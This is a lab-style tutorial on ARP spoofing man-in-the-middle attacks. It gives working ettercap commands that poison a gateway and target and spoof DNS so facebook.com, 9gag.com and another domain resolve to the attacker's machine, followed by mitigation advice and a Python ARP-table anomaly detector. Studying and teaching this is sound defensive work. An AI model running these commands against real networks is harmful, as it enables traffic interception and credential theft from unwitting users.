MITM: ARP spoofing
Description
ARP spoofing (Address Resolution Protocol spoofing) is a type of network attack in which an attacker sends falsified ARP messages to an Ethernet network, in order to link the attacker's MAC address with the IP address of a legitimate computer or server on the network.
ARP is the protocol hosts use to map an IP address to a physical (MAC) address. By sending forged ARP replies, an attacker can convince other devices on the network that the legitimate device's IP address belongs to the attacker's MAC address, so that traffic intended for that device is delivered to the attacker instead.
ARP spoofing attacks can be used for various purposes, including:
- eavesdropping on network traffic
- stealing sensitive information such as login credentials
- conducting Man-in-the-Middle attacks
Diagram

Normal exchange (before poisoning):

  ┌──────────┐   (1) "Hi Router"   ┌──────────┐
  │  Victim  │ ──────────────────▶ │  Router  │
  │          │ ◀────────────────── │          │
  └──────────┘   (2) "Hi Vic"      └──────────┘

After ARP poisoning (the Hacker relays both directions):

  ┌──────────┐  (1) "Hi Router"  ┌──────────┐  (2) "Hi Router"  ┌──────────┐
  │  Victim  │ ────────────────▶ │  Hacker  │ ────────────────▶ │  Router  │
  │          │ ◀──────────────── │          │ ◀──────────────── │          │
  └──────────┘  (4) "Hi Vic"     └──────────┘  (3) "Hi Vic"     └──────────┘
Lab
Step 1 – ettercap configuration
# back up the original DNS spoof configuration before overwriting it
sudo cp /etc/ettercap/etter.dns /etc/ettercap/etter.dns-COPY
# find the attacking machine's own IP address (either command works) and set it below
# ifconfig
# ip a
HACKER_IP=10.0.2.15
# rewrite etter.dns so every listed name (apex, www and wildcard) resolves to HACKER_IP
# with a 60-second TTL; the file is root-owned, so write it through sudo tee rather than
# a plain shell redirection, which fails with "Permission denied" for a normal user
{
  echo ""
  echo "facebook.com A $HACKER_IP 60"
  echo "www.facebook.com A $HACKER_IP 60"
  echo "*.facebook.com A $HACKER_IP 60"
  echo ""
  echo "michalszalkowski.com A $HACKER_IP 60"
  echo "www.michalszalkowski.com A $HACKER_IP 60"
  echo "*.michalszalkowski.com A $HACKER_IP 60"
  echo ""
  echo "9gag.com A $HACKER_IP 60"
  echo "www.9gag.com A $HACKER_IP 60"
  echo "*.9gag.com A $HACKER_IP 60"
} | sudo tee /etc/ettercap/etter.dns > /dev/null
# verify the result
cat /etc/ettercap/etter.dns
Step 2 – malicious page
Step 3 – ettercap
# gateway and victim addresses on the lab network (adjust to your environment)
GATEWAY_IP=10.0.2.1
TARGET=10.0.2.16
# -T text interface, -q quiet, -i capture interface, -M arp:remote poisons both the
# gateway and the target so traffic in both directions passes through this host,
# -P dns_spoof answers DNS queries from etter.dns; targets are written as /IP//
sudo ettercap -Tq -i eth0 -M arp:remote -P dns_spoof /$GATEWAY_IP// /$TARGET//
Step 4 – test
# run on the target machine (10.0.2.16): each name should now resolve to HACKER_IP
# and each curl should return the page served from the attacking host
nslookup michalszalkowski.com
nslookup facebook.com
nslookup 9gag.com
curl michalszalkowski.com
curl facebook.com
curl 9gag.com
Prevention
ARP spoofing can be mitigated with switch-level controls such as Dynamic ARP Inspection, with ARP spoofing detection tools that watch for IP-to-MAC bindings changing or for one MAC answering for several IPs, and by using encrypted communication protocols such as HTTPS so that intercepted traffic cannot be read or altered.
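The detection side of the prevention paragraph, as an added example that is not part of the original lab: a small monitor that parses two snapshots of the victim's neighbour table (the output format of `ip neigh show`) and reports the two symptoms the lab's arp:remote mode produces on the victim, the gateway IP suddenly mapping to a different MAC, and one MAC claiming both the gateway and another host. The sample lines are constructed; the IP addresses mirror the lab's 10.0.2.0/24 layout and the MAC addresses are made up.

```python
"""Detect ARP-cache anomalies that indicate ARP spoofing.

Added example, not part of the original lab. Parses `ip neigh show` output
(constructed sample lines below) and flags two patterns:
  1. an IP address whose MAC changes between snapshots (gateway takeover)
  2. one MAC address bound to several IP addresses (an attacker answering
     for both the gateway and a victim, as the lab's arp:remote mode does)
"""
import re
from collections import defaultdict

# Line format produced by `ip neigh show`, e.g.
# "10.0.2.1 dev eth0 lladdr 52:54:00:12:35:00 REACHABLE"
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) dev (?P<dev>\S+) lladdr "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def parse_neigh(text):
    """Return {ip: mac} from `ip neigh show` output.

    Entries without an lladdr (FAILED / INCOMPLETE) carry no binding and are skipped.
    """
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def find_duplicate_macs(table):
    """Return {mac: [ips...]} for every MAC bound to more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def find_changed_macs(before, after):
    """Return {ip: (old_mac, new_mac)} for IPs whose MAC differs between snapshots."""
    return {
        ip: (before[ip], after[ip])
        for ip in before
        if ip in after and before[ip] != after[ip]
    }


def check_snapshots(before_text, after_text, protected_ips=()):
    """Compare two neighbour-table snapshots and return a list of alert strings.

    A binding change on a protected address (normally the default gateway) is
    rated HIGH; any MAC claiming several IPs is always HIGH.
    """
    before = parse_neigh(before_text)
    after = parse_neigh(after_text)
    alerts = []
    for ip, (old, new) in find_changed_macs(before, after).items():
        severity = "HIGH" if ip in protected_ips else "MEDIUM"
        alerts.append(f"{severity}: {ip} moved from {old} to {new}")
    for mac, ips in find_duplicate_macs(after).items():
        alerts.append(f"HIGH: {mac} claims multiple IPs: {', '.join(ips)}")
    return alerts


# Constructed baseline snapshot: the gateway (10.0.2.1) has its own MAC and
# another host (10.0.2.15) has a different one.
BASELINE = """\
10.0.2.1 dev eth0 lladdr 52:54:00:12:35:00 REACHABLE
10.0.2.15 dev eth0 lladdr 08:00:27:aa:bb:cc STALE
10.0.2.3 dev eth0 FAILED
"""

# Constructed snapshot after poisoning: the gateway IP now maps to the same MAC
# as 10.0.2.15, so that host receives everything meant for the gateway.
POISONED = """\
10.0.2.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
10.0.2.15 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
"""

if __name__ == "__main__":
    for alert in check_snapshots(BASELINE, POISONED, protected_ips={"10.0.2.1"}):
        print(alert)
```

On a real host the two snapshots would come from periodic `ip neigh show` runs, with the default gateway passed in `protected_ips`; a change of the gateway's MAC that does not coincide with a planned hardware swap is the signal to investigate.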
Lab – Appendix